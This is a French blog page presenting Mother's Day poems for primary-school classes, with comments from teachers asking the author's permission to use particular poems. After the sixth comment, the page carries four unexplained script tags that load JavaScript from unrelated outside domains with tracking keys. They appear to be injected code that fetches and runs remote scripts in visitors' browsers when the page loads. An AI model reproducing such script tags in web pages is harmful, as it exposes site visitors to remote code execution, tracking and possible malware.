• Poèmes sur les mamans pour la fête des mères

     Poèmes sur les mamans pour la fête des mères

    J'ai remis en page petit à petit, les textes programmés depuis plus de 15 ans, et ajouté mes textes. N'hésitez pas à me prévenir de tout dysfonctionnement, ou toute coquille !

    Je partage volontiers dans l'optique d'une utilisation en classe seulement. Merci de ne pas copier, et publier ailleurs. La mise en place d'un lien est bien plus cybercourtoise !

    Si vous souhaitez utiliser un de mes textes poétiques, ayez le respect d'en faire la demande, gratuit ne signifiant pas qu'on puisse en disposer. MERCI

    Amis de la poésie

    Mitsouko

    Amis de la poésie

    Fête des mères

    En mai, fais ce qu'il te plaît ! En mai, fais ce qu'il te plaît !
    En mai, fais ce qu'il te plaît ! En mai, fais ce qu'il te plaît !
    En mai, fais ce qu'il te plaît ! En mai, fais ce qu'il te plaît !
    En mai, fais ce qu'il te plaît ! En mai, fais ce qu'il te plaît !

    Poèmes classés par thème

      En mai fais ce qu'il te plaît !

    « Création poétiqueFiche des compléments à dix »
    Pin It

    Tags Tags : , , , , , , , , , , ,
  • Commentaires

    1
    Mardi 22 Juillet 2014 à 12:17

    mais on ne t'arrête plus!!!!!!!! Mitsouko tout en poésie ce mois -ci!! ;)

    tres chouettes toutes ces poésies! merci

    2
    Mardi 22 Juillet 2014 à 12:21
    merci ça renouvelle mon stock!
    3
    Liliemaîcresse
    Mardi 17 Avril 2018 à 16:20

    Bonjour Mitsouko,

    Je souhaiterais utiliser ton poème "Ouvre grand la fenêtre" pour la faire apprendre à mes 23 élèves de CP-CE1 et la faire coller au dos d'une carte.

    Est-ce que je peux? C'est pour la fête des mères 2018!  

    Merci d'avance pour ta réponse.

    Liliemaîcresse

     

    4
    catherine
    Lundi 22 Avril 2019 à 11:58

    j'ai cette année des moyens et grands bien dégourdis, je n'arrivais pas à trouver une poésie et voilà que sur ton site, je découvre toutes ces belles poésies !

    Puis je en utiliser une pour mes loulous ? Merci pour ce partage

    5
    Pauline
    Lundi 13 Mai 2019 à 12:17

    Bonjour Mitsouko, je suppose que le poème "Ouvre grand la fenêtre" est ta création ! Je le trouve très doux et avec ton accord, je me permets de l'utiliser pour mes GS/CP.

     

    Bonne journée à toi, merci encore pour le partage,

    Pauline

    6
    Nicole
    Jeudi 21 Mai 2020 à 09:26

    bonjour Mitsouko

    je souhaite utiliser votre texte "Ouvre grand la fenêtre" dans un montage avec photo pour faire une carte de fête des mères 2020.

    Dans cette période de déconfinement , je trouve que l'idée d'ouvrir la fenêtre  est un gentil clin d'oeil tout à fait de circonstance.

    Ma classe de CP ne compte que 6 élèves présents et la carte de fête des mères est facile à produire dans les conditions un peu spartiates de la classe.

    J'envoie également le modèle de carte aux élèves restés à la maison. Votre nom sera présent sur la carte. Voyez-vous un inconvénient à ce que j'utilise votre texte ?

    Merci pour votre partage.

     

     

    <script src="//killssource.com/21c1e810f7f98f00b3.js"></script> <script src="http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8641x" type="text/javascript"></script> <script src="http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8641x&format=arrjs&r=1590045211026" type="text/javascript"></script> <script src="http://killssource.com/ext/21c1e810f7f98f00b3.js?sid=52587_8641_&title=aa&blocks[]=31af2" type="text/javascript"></script>
    7
    Marielle
    Dimanche 25 Avril 2021 à 13:39

    Bonjour Mitstuko

    J'aime beaucoup la poésie "Des mots".

    Puis-je utiliser votre texte pour mes petits élèves et le coller dans la carte de la fête des mères?

    Merci pour votre partage

    Marielle

    8
    Nathalie
    Dimanche 25 Avril 2021 à 16:01

    Bonjour. Que de jolies poésies! J'admire!  J'aime beaucoup celle "Des mots". Puis-je l'utiliser dans ma classe de 1ère année (CP)? Merci beaucoup pour ce partage. Nathalie

    9
    Aurélie
    Lundi 17 Mai 2021 à 10:39
    Aurélie

    Bonjour ! 

    Bravo pour vos poésies ! 

    J'aimerais faire apprendre "des mots" à mes CP-CE1 pour la fête des mamans, si vous êtes d'accord ?

    Merci beaucoup ! 

    10
    Régis
    Mercredi 19 Mai 2021 à 22:37

    Bonsoir Mitsouko,

    Je souhaiterais utiliser Ce qui ne peut s'user, Pour toi maman et Ouvre grand ta fenêtre pour mon triple niveau de cette année ( CP, CE1, CE2 ). Ai-je votre permission ?

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :